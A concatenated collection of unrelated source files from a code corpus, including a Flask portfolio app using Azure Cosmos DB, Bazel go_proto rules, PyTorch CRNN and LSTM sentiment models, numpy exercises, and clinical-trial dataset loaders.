with open(path_tmp, 'wb') as f:
while True:
chunk = remote.read(4096)
if not chunk:
break
hh.update(chunk)
f.write(chunk)
os.rename(path_tmp, target_path)
hash0 = hh.hexdigest()
return hash0
## somehow this was not always working -- some bits were wrong for large files!
def old_steady_download_and_compute_hash(url: str, algorithm: str, target_path: str, chunk_size: int=1024 * 1024 * 40) -> str:
response = requests.head(url)
size_bytes = int(response.headers['content-length'])
str0 = ''.join(random.sample(string.ascii_lowercase, 8))
path_tmp = target_path + '.tmp.' + str0
try:
hh = getattr(hashlib, algorithm)()
with open(path_tmp, 'wb') as f:
for ii in range(0, size_bytes, chunk_size):
jj = ii + chunk_size
if jj > size_bytes:
jj = size_bytes
headers = {
'Range': 'bytes={}-{}'.format(ii, jj - 1)
}
response = requests.get(url, headers=headers, stream=True)
for chunk in response.iter_content(chunk_size=5120):
if chunk: # filter out keep-alive new chunks
hh.update(chunk)
f.write(chunk)
os.rename(path_tmp, target_path)
hash0 = hh.hexdigest()
return hash0
except:
if os.path.exists(path_tmp):
os.remove(path_tmp)
raise
| 2.640625 | 3 |
proto/def.bzl | mikedanese/rules_go | 1 | 12789333 | load("@io_bazel_rules_go//go/private:common.bzl",
"go_importpath",
)
load("@io_bazel_rules_go//go/private:mode.bzl",
"RACE_MODE",
"NORMAL_MODE",
)
load("@io_bazel_rules_go//go/private:providers.bzl",
"get_library",
"GoLibrary",
"GoEmbed",
)
load("@io_bazel_rules_go//go/private:rules/prefix.bzl",
"go_prefix_default",
)
def _go_proto_library_impl(ctx):
go_proto_toolchain = ctx.toolchains[ctx.attr._toolchain]
importpath = go_importpath(ctx)
go_srcs = go_proto_toolchain.compile(ctx,
proto_toolchain = ctx.toolchains["@io_bazel_rules_go//proto:proto"],
go_proto_toolchain = go_proto_toolchain,
lib = ctx.attr.proto,
importpath = importpath,
)
go_toolchain = ctx.toolchains["@io_bazel_rules_go//go:toolchain"]
golib, goembed = go_toolchain.actions.library(ctx,
go_toolchain = go_toolchain,
srcs = go_srcs,
deps = ctx.attr.deps + go_proto_toolchain.deps,
embed = ctx.attr.embed,
want_coverage = ctx.coverage_instrumented(),
importpath = importpath,
)
return [
golib, goembed,
DefaultInfo(
files = depset([get_library(golib, NORMAL_MODE)]),
runfiles = golib.runfiles,
),
OutputGroupInfo(
race = depset([get_library(golib, RACE_MODE)]),
),
]
go_proto_library = rule(
_go_proto_library_impl,
attrs = {
"proto": attr.label(mandatory=True, providers=["proto"]),
"deps": attr.label_list(providers = [GoLibrary]),
"importpath": attr.string(),
"embed": attr.label_list(providers = [GoEmbed]),
"gc_goopts": attr.string_list(),
"_go_prefix": attr.label(default = go_prefix_default),
"_go_toolchain_flags": attr.label(default=Label("@io_bazel_rules_go//go/private:go_toolchain_flags")),
"_toolchain": attr.string(default = "@io_bazel_rules_go//proto:go_proto"),
},
toolchains = [
"@io_bazel_rules_go//go:toolchain",
"@io_bazel_rules_go//proto:proto",
"@io_bazel_rules_go//proto:go_proto",
],
)
"""
go_proto_library is a rule that takes a proto_library (in the proto
attribute) and produces a go library for it.
"""
go_grpc_library = rule(
_go_proto_library_impl,
attrs = {
"proto": attr.label(mandatory=True, providers=["proto"]),
"deps": attr.label_list(providers = [GoLibrary]),
"importpath": attr.string(),
"embed": attr.label_list(providers = [GoEmbed]),
"gc_goopts": attr.string_list(),
"_go_prefix": attr.label(default = go_prefix_default),
"_toolchain": attr.string(default = "@io_bazel_rules_go//proto:go_grpc"),
"_go_toolchain_flags": attr.label(default=Label("@io_bazel_rules_go//go/private:go_toolchain_flags")),
},
toolchains = [
"@io_bazel_rules_go//go:toolchain",
"@io_bazel_rules_go//proto:proto",
"@io_bazel_rules_go//proto:go_grpc",
],
)
"""
go_grpc_library is a rule that takes a proto_library (in the proto
attribute) and produces a go library that includes grpc services for it.
"""
def proto_register_toolchains():
native.register_toolchains(
"@io_bazel_rules_go//proto:proto",
"@io_bazel_rules_go//proto:go_proto",
"@io_bazel_rules_go//proto:go_grpc",
)
| 1.6875 | 2 |
miyu_bot/commands/docs/documentation_fluent_localization.py | qwewqa/miyu-bot | 11 | 12789334 | from fluent.runtime import FluentLocalization
class DocumentationFluentLocalization(FluentLocalization):
def format_value(self, msg_id, args=None, fallback=None):
for bundle in self._bundles():
if not bundle.has_message(msg_id):
continue
msg = bundle.get_message(msg_id)
if not msg.value:
continue
val, errors = bundle.format_pattern(msg.value, args)
return val
return fallback if fallback is not None else msg_id
| 2.390625 | 2 |
app.py | IndieDragoness/portfolio | 0 | 12789335 | <filename>app.py
from flask import Flask, render_template, request, send_file
from azure.cosmos import exceptions, CosmosClient, PartitionKey
from azure.core.exceptions import ResourceExistsError
from scripts import utilities
import logging
import json
import os
# ================================== #
# _____
# / _ \ ________ __ __ _______ ____
# / /_\ \ \___ /| | \\_ __ \_/ __ \
# / | \ / / | | / | | \/\ ___/
# \____|__ //_____ \|____/ |__| \___ >
# \/ \/ \/
#
# ================================== #
# Microsoft Azure Cosmos DB Initialization
# Create Cosmos Client
endpoint = os.environ["COSMOS_DATABASE_ENDPOINT"]
key = os.environ["COSMOS_DATABASE_KEY"]
client = CosmosClient(endpoint, key)
database_name = os.environ["COSMOS_DATABASE_NAME"]
database = client.get_database_client(database_name)
container_name = os.environ["COSMOS_CONTAINER_NAME"]
container = database.get_container_client(container_name)
# ================================== #
# ___________.__ __
# \_ _____/| | _____ ______| | __
# | __) | | \__ \ / ___/| |/ /
# | \ | |__ / __ \_ \___ \ | <
# \___ / |____/(____ //____ >|__|_ \
# \/ \/ \/ \/
# ================================== #
# Static is where all of our static files are stored
app = Flask(__name__, static_url_path='/static')
# Setup Flask Logging to record events at Runtime
logging.basicConfig(filename='record.log', level=logging.DEBUG, format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')
@app.route("/")
def main():
return render_template("index.htm")
# Link to disc_drive_project.htm
@app.route('/disc_drive_project')
def disc_drive_project():
return render_template("disc_drive_project.htm")
# Link to particle_accelerator_project.htm
@app.route('/particle_accelerator_project')
def particle_accelerator_project():
return render_template("particle_accelerator_project.htm")
# Link to tensorflow_project.htm
@app.route('/tensorflow_project')
def tensorflow_project():
return render_template("tensorflow_project.htm")
# Link to unity_project.htm
@app.route('/unity_project')
def unity_project():
return render_template("unity_project.htm")
# Link to microsoft_azure_project.htm
@app.route('/microsoft_azure_project')
def microsoft_azure_project():
return render_template("microsoft_azure_project.htm")
# Link to docker_project.htm
@app.route('/docker_project')
def docker_project():
return render_template("docker_project.htm")
# Link to linux_project.htm
@app.route('/linux_project')
def linux_project():
return render_template("linux_project.htm")
# Link to linux_project.htm
@app.route('/awx_ansible_project')
def awx_ansible_project():
return render_template("awx_ansible_project.htm")
# Download my RL-PCG Paper
@app.route('/unity_project/download_rlpcg_paper', methods=['POST'])
def download_rlpcg_paper():
app.logger.info('Paper Download Detected!')
return send_file('static/documents/Teaching_RL_PCG_via_Educational_Game.pdf', as_attachment=True)
# Section correlates to the Contact Form in index.htm
@app.route('/contact_form_action', methods=['POST'])
def contact_form_action():
app.logger.info('Contact Form Submission Detected!')
# Retrieve data from HTML inputs
name = request.form['Name']
email = request.form['Email']
subject = request.form['Subject']
message = request.form['Message']
# Log data entered
app.logger.info('Name: ' + name)
app.logger.info('Email: ' + email)
app.logger.info('Subject: ' + subject)
app.logger.info('Message: ' + message)
# Post data to Contact_Form container in Microsoft Azure Cosmos DB
try: # Try to create a new entry with given data
app.logger.info('Checking if email is already present in database...')
# Portfolio Section is the Partition Key for the Portfolio Container (used for point reads and writes)
new_entry = {'id': email, 'name': name, 'message': subject + ": " + message, 'portfolio_section': "contact_form"}
container.create_item(new_entry)
app.logger.info('Email not present! Created new database entry successfully: ' + email)
except ResourceExistsError: # Add to existing entry if unable to create a new one
app.logger.info('Email already present in database. Adding new message to existing entry: ' + email)
# Get the current entry in the database for this email and add this new message
properties = container.read()
app.logger.info(properties)
items = container.read_all_items()
app.logger.info(items)
item = container.read_item(email, partition_key="contact_form")
app.logger.info('Acquired item.\n{}'.format(item))
# Get the number of keys containing "message" substring
message_count = utilities.count_string_in_dictionary_keys(str_value="message", dict_value=item)
app.logger.info('This is the {} message for this id.'.format(message_count))
item["message{}".format(message_count)] = subject + ": " + message
updated_item = container.upsert_item(item)
# Scroll the page down to the Contact Form, after Submit is pressed, and say 'Thank you!'
return render_template("/index.htm", submit_button_pressed="contact") | 2.078125 | 2 |
numpy_practice/a2_arrays.py | dkp-1024/my_machine_learning | 0 | 12789336 | <gh_stars>0
import numpy as np
#creating arrays
array = np.zeros(10, dtype='int')
# array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
# print(array)
#creating a 3 row x 5 column matrix
array = np.ones((3,5), dtype=float)
# array([[ 1., 1., 1., 1., 1.],
# [ 1., 1., 1., 1., 1.],
# [ 1., 1., 1., 1., 1.]])
# print(array)
#creating a matrix with a predefined value
array = np.full((3,5),1.23)
# array([[ 1.23, 1.23, 1.23, 1.23, 1.23],
# [ 1.23, 1.23, 1.23, 1.23, 1.23],
# [ 1.23, 1.23, 1.23, 1.23, 1.23]])
# print(array)
#create an array with a set sequence
array = np.arange(0, 20, 2)
# array([0, 2, 4, 6, 8,10,12,14,16,18])
# print(array)
#create an array of even space between the given range of values
array = np.linspace(0, 1, 5)
# array([ 0., 0.25, 0.5 , 0.75, 1.])
# print(array)
#create a 3x3 array with mean 0 and standard deviation 1 in a given dimension
array = np.random.normal(0, 1, (3,3))
# array([[ 0.72432142, -0.90024075, 0.27363808],
# [ 0.88426129, 1.45096856, -1.03547109],
# [-0.42930994, -1.02284441, -1.59753603]])
# print(array)
#create an identity matrix
array = np.eye(3)
# array([[ 1., 0., 0.],
# [ 0., 1., 0.],
# [ 0., 0., 1.]])
#set a random seed
np.random.seed(0)
x1 = np.random.randint(10, size=6) #one dimension
x2 = np.random.randint(10, size=(3,4)) #two dimension
x3 = np.random.randint(10, size=(3,4,5)) #three dimension
print("x3 ndim:", x3.ndim)
print("x3 shape:", x3.shape)
print("x3 size: ", x3.size)
# ('x3 ndim:', 3)
# ('x3 shape:', (3, 4, 5))
# ('x3 size: ', 60)
# ..............................................................................
# print the results at any level
print(array) | 3.125 | 3 |
src/DeepMatter/VAE_PFM/__init__.py | m3-learning/DeepMatter | 2 | 12789337 | """
"""
from . import core
from . import file
from . import machine_learning
from . import dictionary_learning | 0.972656 | 1 |
random_forest_regression.py | manuelmusngi/machine_learning_algorithms_for_development | 1 | 12789338 | <gh_stars>1-10
# Random Forest Regression
# Import the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import the dataset
dataset = pd.read_('')
X = dataset.iloc[:, 1:-1].values
y = dataset.iloc[:, -1].values
# Train the Random Forest Regression model on the dataset
from sklearn.ensemble import RandomForestRegressor
regressor = RandomForestRegressor(n_estimators = 10, random_state = 0)
regressor.fit(X, y)
# Predict the Training set results
regressor.predict([[6.5]])
# Visualize the Random Forest Regression results
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('')
plt.xlabel('')
plt.ylabel('')
plt.show()
| 3.46875 | 3 |
moosetools/__init__.py | NidorFanClub/oatcogs | 1 | 12789339 | from .moosetools import MooseTools
def setup(bot):
bot.add_cog(MooseTools())
| 1.46875 | 1 |
models/crnn.py | VanillaBrooks/Splitr | 1 | 12789340 | import sys
sys.path.insert(0, r'C:\Users\Brooks\github\splitr')# access library code from outside /models
# library functions:
import torch
import time
import pandas as pd
# Splitr modules:
import model_utils
# this is really a constructor for a bidirectional LSTM but i figured
# BD_LSTM was only 2 letters off of BDSM so why not
class BDSM(torch.nn.Module):
def __init__(self, num_inputs, num_hidden_layers,char_in, char_out, layer_count=1):
super(BDSM, self).__init__()
self.char_out = char_out
# make the last layer not have a linear layer inside
self.rnn = torch.nn.LSTM(num_inputs, num_hidden_layers, num_layers=layer_count, bidirectional=True, batch_first=True)
self.linear = torch.nn.Linear(char_in, char_out)
self.relu = torch.nn.ReLU()
def forward(self, x):
# print('>>starting rnn that has output chars of', x.shape)
rnn_output, _ = self.rnn(x)
# print('raw rnn out', rnn_output.shape)
batch, char_count, depth = rnn_output.shape
rnn_output = rnn_output.contiguous().view(batch*depth, char_count)
# print('reshaped rnn out', rnn_output.shape)
linear = self.linear(rnn_output)
output = linear.view(batch, self.char_out, depth)
# print('after linear shape', output.shape)
output =self.relu(output)
return output
# Convolution cell with adjustable activation / maxpool size / batchnorm
class CNN_cell(torch.nn.Module):
def __init__(self,in_channels=False,out_channels=False,kernel_size=3,activation=False, pool_shape=False, pool_stride=False, batchnorm=False):
super(CNN_cell, self).__init__()
_layers = []
if in_channels and out_channels:
_layers.append(torch.nn.Conv2d(in_channels, out_channels,kernel_size))
if activation:
_layers.append(self.find_activation(activation))
if batchnorm:
_layers.append(torch.nn.BatchNorm2d(batchnorm))
if pool_shape and pool_stride:
_layers.append(torch.nn.MaxPool2d(pool_shape, pool_stride))
self.cnn = torch.nn.Sequential(*_layers)
def find_activation(self, activation):
if activation == 'relu':
return torch.nn.ReLU()
elif activation == 'tanh':
return torch.nn.Tanh()
elif activation == 'leaky':
return torch.nn.LeakyReLU()
else:
print('activation function call |%s| is not configured' % activation )
def forward(self, input_tensor):
output = self.cnn(input_tensor)
return output
# https://arxiv.org/pdf/1507.05717.pdf
class model(torch.nn.Module):
def __init__(self, channel_count=1,num_hidden= 256, unique_char_count=57,rnn_layer_stack=1):
super(model, self).__init__()
# add dropout to cnn layers
self.softmax = torch.nn.LogSoftmax(dim=2)
# CONVOLUTIONS
_cnn_layer = []
_cnn_layer.append(CNN_cell(in_channels=1, out_channels=64, kernel_size=3, activation='relu', pool_shape=False, pool_stride=False))
_cnn_layer.append(CNN_cell(in_channels=64 , out_channels=128, kernel_size=3, activation='relu', pool_shape=(2,2), pool_stride=2))
_cnn_layer.append(CNN_cell(in_channels=128, out_channels=256, kernel_size=3, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=256, out_channels=512, kernel_size=3, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=3, activation='relu', pool_shape=(1,2), pool_stride=2))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu', batchnorm=512))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
_cnn_layer.append(CNN_cell(in_channels=512, out_channels=512, kernel_size=2, activation='relu'))
# RNN LAYERS
_bdsm_layer = []# 2048
# _bdsm_layer.append(BDSM(num_inputs=512, num_hidden_layers=num_hidden, char_in=56,char_out=56, layer_count=rnn_layer_stack))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden, char_in=85,char_out=140, layer_count=1))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= 140, char_out=190, layer_count=1))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= 190, char_out=250, layer_count=1))
# _bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= 250, char_out=350, layer_count=1))
inc = 1.26
max_len = 80
current = 53
p = 0
while current < max_len:
p+=1
prev = current
current = int(inc * prev)
print(prev, current)
_bdsm_layer.append(BDSM(num_inputs=num_hidden*2, num_hidden_layers=num_hidden,char_in= prev, char_out=current, layer_count=1))
print('number of rnns stacked %s' % p)
# CHAR activations (transcription)
self.linear = torch.nn.Sequential(
torch.nn.Linear(in_features=num_hidden*2, out_features=unique_char_count),torch.nn.ReLU())
self.cnn = torch.nn.Sequential(*_cnn_layer)
self.rnn = torch.nn.Sequential(*_bdsm_layer)
def forward(self, x):
t = self.cnn(x)
batch, depth, height, base = t.shape
# print('raw cnn shape: ', t.shape)
# import sys
# cnn_output = t.view(batch, height, depth*base)
cnn_output = t.view(batch, base, height*depth)
# print(' NEW after reshape', cnn_output.shape, type(cnn_output))
# sys.exit('exits')
rnn_output = self.rnn(cnn_output)
batch, char_len, depth = rnn_output.shape
rnn_output = rnn_output.contiguous().view(batch*char_len, depth)
# print('rnn output ', rnn_output.shape)
output = self.linear(rnn_output).view(batch, char_len, -1)
output = self.softmax(output)
return output
| 2.921875 | 3 |
test/vertex_cover_gen.py | s17k/VertexCover | 0 | 12789341 | <reponame>s17k/VertexCover<filename>test/vertex_cover_gen.py
import random
n = random.randint(1,3)
m = random.randint(1, n*(n-1)//2)
print str(n) + ' ' + str(m)
for i in range(m):
a = b = 1
while a == b:
a = random.randint(1,n)
b = random.randint(1,n)
print str(a) + ' ' + str(b)
print random.randint(0,5)
| 3.09375 | 3 |
PyTorch/Resources/Examples/02_lstm_sentiment_analysis.py | methylDragon/python-data-tools-reference | 9 | 12789342 | # Modified from SUTD and https://github.com/bentrevett/pytorch-sentiment-analysis
# Sentiment Analysis on IMDB with FashionMNIST
# We're using packed sequences for training
# For more info: https://stackoverflow.com/questions/51030782/why-do-we-pack-the-sequences-in-pytorch
import torch.nn as nn
import torchtext
import torch
from torchtext.legacy import data
from torchtext.legacy import datasets
import torch.optim as optim
import random
import time
# MODEL ========================================================================
class BidirectionalLSTM(nn.Module):
def __init__(self,
input_dim,
embedding_dim=100,
hidden_dim=256,
output_dim=1,
n_layers=2,
bidirectional=True,
dropout=0.5,
pad_idx=0):
super().__init__()
self.embedding = nn.Embedding(input_dim,
embedding_dim,
padding_idx=pad_idx)
self.rnn = nn.LSTM(embedding_dim,
hidden_dim,
num_layers=n_layers,
bidirectional=bidirectional,
dropout=dropout)
self.fc = nn.Linear(hidden_dim * 2, output_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, text, text_lengths):
embedded = self.dropout(self.embedding(text)) # Map text to embedding
# Pack sequence
# Note: We move text_lengths to cpu due to a small bug
# https://github.com/pytorch/pytorch/issues/43227
packed_embedded = nn.utils.rnn.pack_padded_sequence(
embedded, text_lengths.cpu()
)
packed_output, (hidden, cell) = self.rnn(packed_embedded) # Feedforward
# Unpack sequence
output, output_lengths = nn.utils.rnn.pad_packed_sequence(packed_output)
hidden = self.dropout(torch.cat((hidden[-2,:,:],
hidden[-1,:,:]),
dim = 1))
return self.fc(hidden)
# TRAINING UTILITIES ===========================================================
def binary_accuracy(preds, y):
"""
Returns accuracy per batch, i.e. if you get 8/10 right, this returns 0.8, NOT 8
"""
# Round predictions to the closest integer
rounded_preds = torch.round(torch.sigmoid(preds))
correct = (rounded_preds == y).float() #convert into float for division
acc = correct.sum() / len(correct)
return acc
def train(model, iterator, optimizer, criterion):
epoch_loss, epoch_acc = 0, 0
model.train() # Set to training mode
for batch in iterator:
optimizer.zero_grad()
text, text_lengths = batch.text
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, batch.label)
acc = binary_accuracy(predictions, batch.label)
loss.backward()
optimizer.step()
epoch_loss += loss.item()
epoch_acc += acc.item()
return epoch_loss / len(iterator), epoch_acc / len(iterator)
def evaluate(model, iterator, criterion):
epoch_loss, epoch_acc = 0, 0
model.eval() # Set to evaluation mode
with torch.no_grad(): # Don't track gradients
for batch in iterator:
text, text_lengths = batch.text
predictions = model(text, text_lengths).squeeze(1)
loss = criterion(predictions, batch.label)
acc = binary_accuracy(predictions, batch.label)
epoch_loss += loss.item()
epoch_acc += acc.item()
return epoch_loss / len(iterator), epoch_acc / len(iterator)
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
if __name__ == "__main__":
# MAKE DETERMINISTIC =======================================================
SEED = 1234
torch.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
# LOAD DATA ================================================================
# Spacy is good for tokenisation in other languages
TEXT = data.Field(tokenize = 'spacy', include_lengths = True)
LABEL = data.LabelField(dtype = torch.float)
# If slow, use this instead:
# def tokenize(s):
# return s.split(' ')
# TEXT = data.Field(tokenize=tokenize, include_lengths = True)
# Test-valid-train split
train_data, test_data = datasets.IMDB.splits(TEXT, LABEL)
train_data, valid_data = train_data.split(random_state = random.seed(SEED))
# Visualise
example = next(iter(test_data))
example.label
example.text
# Note: Using glove embeddings (~900mb)
TEXT.build_vocab(
test_data,
max_size = 25000,
vectors = "glove.6B.100d",
unk_init = torch.Tensor.normal_ # how to initialize unseen words not in glove
)
LABEL.build_vocab(test_data)
# Data iterators
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
train_iterator, valid_iterator, test_iterator = data.BucketIterator.splits(
(train_data, valid_data, test_data),
batch_size = 64,
sort_within_batch = True,
device = device)
# MODEL ====================================================================
PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token] # Specifies index when word is missing
model = BidirectionalLSTM(input_dim=len(TEXT.vocab),
embedding_dim=100,
hidden_dim=256,
output_dim=1,
n_layers=2, # To make LSTM deep
bidirectional=True,
dropout=0.5,
pad_idx=PAD_IDX)
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
count_parameters(model) # 4,810,857 (wow!)
# Copy embeddings to model
pretrained_embeddings = TEXT.vocab.vectors
model.embedding.weight.data.copy_(pretrained_embeddings)
# Zero out <UNK> and <PAD> tokens
UNK_IDX = TEXT.vocab.stoi[TEXT.unk_token]
model.embedding.weight.data[UNK_IDX] = torch.zeros(EMBEDDING_DIM)
model.embedding.weight.data[PAD_IDX] = torch.zeros(EMBEDDING_DIM)
# TRAIN ====================================================================
optimizer = optim.Adam(model.parameters())
criterion = nn.BCEWithLogitsLoss()
model = model.to(device)
criterion = criterion.to(device)
N_EPOCHS = 5
best_valid_loss = float('inf')
for epoch in range(N_EPOCHS):
start_time = time.time()
train_loss, train_acc = train(model, train_iterator, optimizer, criterion)
valid_loss, valid_acc = evaluate(model, valid_iterator, criterion)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
torch.save(model.state_dict(), 'tut2-model.pt')
print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')
print(f'\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')
print(f'\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc*100:.2f}%')
# WHEN DONE.. ==============================================================
model.load_state_dict(torch.load('tut2-model.pt'))
test_loss, test_acc = evaluate(model, test_iterator, criterion)
print(f'Test Loss: {test_loss:.3f} | Test Acc: {test_acc*100:.2f}%')
# TRY WITH USER INPUT ======================================================
import spacy
nlp = spacy.load('en')
def predict_sentiment(model, sentence):
model.eval()
tokenized = [tok.text for tok in nlp.tokenizer(sentence)]
indexed = [TEXT.vocab.stoi[t] for t in tokenized]
length = [len(indexed)]
tensor = torch.LongTensor(indexed).to(device)
tensor = tensor.unsqueeze(1)
length_tensor = torch.LongTensor(length)
prediction = torch.sigmoid(model(tensor, length_tensor))
return prediction.item()
predict_sentiment(model, "This film is great")
| 3.1875 | 3 |
auton_survival/datasets_biolincc.py | mononitogoswami/auton-survival | 0 | 12789343 | <reponame>mononitogoswami/auton-survival
import pandas as pd
import numpy as np
def _encode_cols_index(df):
columns = df.columns
# Convert Objects to Strings
for col in columns:
if df[col].dtype == 'O':
df.loc[:, col] = df[col].values.astype(str)
# If Index is Object, covert to String
if df.index.dtype == 'O':
df.index = df.index.values.astype(str)
return df
def load_support(location=''):
data = pd.read_csv(location+"support2.csv")
drop_cols = ['death', 'd.time']
outcomes = data.copy()
outcomes['event'] = data['death']
outcomes['time'] = data['d.time']
outcomes = outcomes[['event', 'time']]
cat_feats = ['sex', 'dzgroup', 'dzclass', 'income', 'race', 'ca']
num_feats = ['age', 'num.co', 'meanbp', 'wblc', 'hrt', 'resp',
'temp', 'pafi', 'alb', 'bili', 'crea', 'sod', 'ph',
'glucose', 'bun', 'urine', 'adlp', 'adls']
return outcomes, data[cat_feats+num_feats]
def load_actg(location=''):
data = pd.read_csv(location+"ACTG175.csv", index_col='pidnum')
drop_cols = ['cens', 'days', 'arms']
outcomes = data.copy()
outcomes['event'] = data['cens']
outcomes['time'] = data['days']
outcomes = outcomes[['event', 'time']]
features = data.drop(columns=drop_cols, inplace=False)
columns = list(set(features.columns)-set(['Unnamed: 0', 'arms']))
return outcomes, features[columns]
def _load_generic_biolincc_dataset(outcome_tbl, time_col, event_col, features, id_col,
visit_col=None, baseline_visit=None, location=''):
if not isinstance(baseline_visit, (tuple, set, list)):
baseline_visit = [baseline_visit]
# List of all features to extract
all_features = []
for feature in features:
all_features+=features[feature]
all_features = list(set(all_features)) # Only take the unqiue columns
if '.sas' in outcome_tbl: outcomes = pd.read_sas(location+outcome_tbl, index=id_col)
elif '.csv' in outcome_tbl: outcomes = pd.read_csv(location+outcome_tbl, index_col=id_col, encoding='latin-1')
else: raise NotImplementedError()
outcomes = outcomes[[time_col, event_col]]
dataset = outcomes.copy()
dataset.columns = ['time', 'event']
for feature in features:
if '.sas' in outcome_tbl: table = pd.read_sas(location+feature, index=id_col)
elif '.csv' in outcome_tbl: table = pd.read_csv(location+feature, index_col=id_col)
else: raise NotImplementedError()
if (visit_col is not None) and (visit_col in table.columns):
mask = np.zeros(len(table[visit_col])).astype('bool')
for baseline_visit_ in baseline_visit:
mask = mask | (table[visit_col]==baseline_visit_)
table = table[mask]
table = table[features[feature]]
print(table.shape)
dataset = dataset.join(table)
outcomes = dataset[['time', 'event']]
features = dataset[all_features]
outcomes = _encode_cols_index(outcomes)
features = _encode_cols_index(features)
return outcomes, features
def load_crash2(endpoint=None, features=None, location=''):
if features is None:
print("No Features Specified!! using default demographic features.")
features = {'CRASH-2_unblindedcodelist.csv': ['t_code'],
'CRASH-2_data_1.csv': ['iage', 'isex', 'ninjurytime',
'iinjurytype', 'isbp', 'irr',
'icc', 'ihr', 'igcseye', 'igcsmotor',
'igcsverbal', 'igcs', 'trandomised',
'ddeath', 'ddischarge']}
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl='CRASH-2_data_1.csv',
time_col='trandomised',
event_col='ddeath',
features=features,
id_col='ientryid',
location=location+'CRASH2/')
time_rand = pd.to_datetime(outcomes['time'], format='%d/%m/%Y')
time_disch = pd.to_datetime(features['ddischarge'], format='%d/%m/%Y')
time_death = pd.to_datetime(features['ddeath'], format='%d/%m/%Y')
features.drop(columns=['ddischarge', 'ddeath', 'trandomised'], inplace=True)
outcomes['event'] = (~np.isnan(time_death)).astype('int')
time = np.empty_like(time_rand)
time[~np.isnan(time_disch)] = time_disch[~np.isnan(time_disch)]
time[~np.isnan(time_death)] = time_death[~np.isnan(time_death)]
outcomes['time'] = (time - time_rand).dt.days
features = features.loc[outcomes['time'].values.astype(int)>=0]
outcomes = outcomes.loc[outcomes['time'].values.astype(int)>=0]
return outcomes, features
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'death'
# Set the outcome variable
event = endpoint
if event[-3:] == 'dth': time = 'deathfu'
else: time = event + 'fu'
def load_bari2d(endpoint=None, features=None, location=''):
if features is None:
print("No Features Specified!! using default demographic features.")
features = {'bari2d_bl.sas7bdat': ['strata', 'weight',
'bmi', 'age',
'sex', 'race'],
}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'death'
# Set the outcome variable
event = endpoint
if event[-3:] == 'dth': time = 'deathfu'
else: time = event + 'fu'
return _load_generic_biolincc_dataset(outcome_tbl='bari2d_endpts.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='id',
location=location+'BARI2D/data/')
def load_topcat(endpoint=None, features=None, location=''):
# Default Baseline Features to include:
if features is None:
print("No Features Specified!! using default baseline features.")
features = {'t003.sas7bdat': ['age_entry', 'GENDER',
'RACE_WHITE', 'RACE_BLACK',
'RACE_ASIAN', 'RACE_OTHER',],
't005.sas7bdat': ['DM'],
't011.sas7bdat': ['country'],
'outcomes.sas7bdat':['drug'],
}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'death'
# Set the outcome variable
event = endpoint
if 'death' in endpoint:
time = 'time_death'
else:
time = 'time_' + event
return _load_generic_biolincc_dataset(outcome_tbl='outcomes.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='ID',
location=location+'TOPCAT/datasets/')
def load_allhat(endpoint=None, features=None, location=''):
# Default Baseline Features to include:
if features is None:
print("No Features Specified!! using default baseline features.")
categorical_features = ['RZGROUP', 'RACE', 'HISPANIC', 'ETHNIC',
'SEX', 'ESTROGEN', 'BLMEDS', 'MISTROKE',
'HXCABG', 'STDEPR', 'OASCVD', 'DIABETES',
'HDLLT35', 'LVHECG', 'WALL25', 'LCHD',
'CURSMOKE', 'ASPIRIN', 'LLT', 'RACE2',
'BLMEDS2', 'GEOREGN']
numeric_features = ['AGE', 'BLWGT', 'BLHGT', 'BLBMI', 'BV2SBP',
'BV2DBP', 'EDUCAT', 'APOTAS', 'BLGFR']
features = {'hyp_vsc.sas7bdat': categorical_features + numeric_features}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'DEATH'
# Set the outcome variable
event = endpoint
if 'CANCER' in endpoint: time = 'DYCANC'
elif 'EP_CHD' in endpoint: time = 'DYCHD'
else: time = 'DY' + event
full_location = location+'ALLHAT/ALLHAT_v2016a/DATA/Summary/'
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl='hyp_vsc.sas7bdat',
time_col=time,
event_col=event,
features=features,
